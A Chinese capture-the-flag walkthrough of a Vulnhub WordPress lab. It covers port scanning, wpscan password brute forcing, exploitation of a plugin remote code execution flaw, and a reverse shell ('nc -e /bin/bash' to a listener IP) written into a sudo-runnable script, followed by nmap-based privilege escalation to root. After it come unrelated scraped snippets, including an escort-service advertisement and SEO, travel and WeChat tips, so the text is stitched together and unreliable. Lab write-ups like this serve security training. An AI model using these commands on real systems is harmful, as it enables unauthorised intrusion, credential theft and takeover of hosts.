Vulnhub提示:
扫描靶机IP地址:nmap -sP 192.168.10.0/24
扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129
开放端口22,80
访问80端口发现URL被重定向到wordy
我们需要在host文件中添加
文件位置 /etc/hosts
可以访问到啦
扫描下目录结构吧,
御剑扫描
发现是wordpress站点
使用WPscan扫描
一款专注于wordpress站点扫描工具
wpscan -url wordy
顺便枚举一下用户
站点没发现什么漏洞,暴力破解尝试下
root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt
破解很久没获取密码,这时候想起Vulnhub重要提示
root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
使用这个字典在尝试下暴力破解
root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt
获得密码
mark
helpdesk01
登录后台发现Activity on Wordy插件存在远程代码执行漏洞
利用远程代码执行命令漏洞步骤:
step1:打开burpsuite工具设置 ***
step2:
step3:发送到重写模块
step4:kali打开端口监听
step5:利用成功获取到webshell
横向移动搜寻可以利用的信息
成功找到了graham的密码信息
查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本
如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell
echo “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh
kali 端监听 8888 端口
sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的
jens用户可以以 root权限执行 nmap nmap 提权分为两种
旧版本上以进入交互提权
# 进入nmap的交互模式 nmap --interactive # 执行sh,提权成功 !sh
新版本
echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF
网站优化诊断的其中一项,就是检查有无做robots文件,是否规范。如果网站的robots协议文件禁止了搜索引擎蜘蛛,那么无论你怎么优化都不会被收录。 趁着写这篇文章,给这句话做个纠正,请大家认真阅读...
唐山市商务伴游招骋 服务项目材料价目表【赵美美】,上海市是一座成功者的集中地,对商业服务女学妹的要求也是较为大的,今日大牌明星商务共享女学妹访梦,年纪深圳市 女 31,婚姻生活:保密性,文凭:普通高中...
深圳到香港(大陆人如何去香港工作) 说到去香港 深圳人都知道这几个口岸 罗湖、福田、深圳湾 皇岗、沙头角、文锦渡 6个通关口岸过关入港 但每到节假日,各大口岸人满为患 那无尽的队伍不仅会...
微信聊天记录怎么保存?我们在使用微信的过程中,会有一些重要的聊天记录想要保存下来,除了截图、收藏,还有别的好方法。 不小心删除的微信聊天记录怎么恢复 打开微信,点击顶部搜索栏,输入“recover”点...
元宵节快乐。做人呐,最重要的就是开心快乐。你饿不饿啊,不如我把下面这些文案揉进汤圆里,煮给你吃啊。 01 教诲培训 文案1:熬过一段时间,就会酿成熟。 进修是反人性的,就像煮汤圆一样,是很煎熬的。...
如今,学生创业总数愈来愈多了,许多学生刚大学毕业就添加了自主创业精兵当中,如今的确是一个自主创业的新时代,可是在任何时刻自主创业都并不是一个简易的事儿,如果你是怀着一种无需工作,要想随意的心态,那麼成...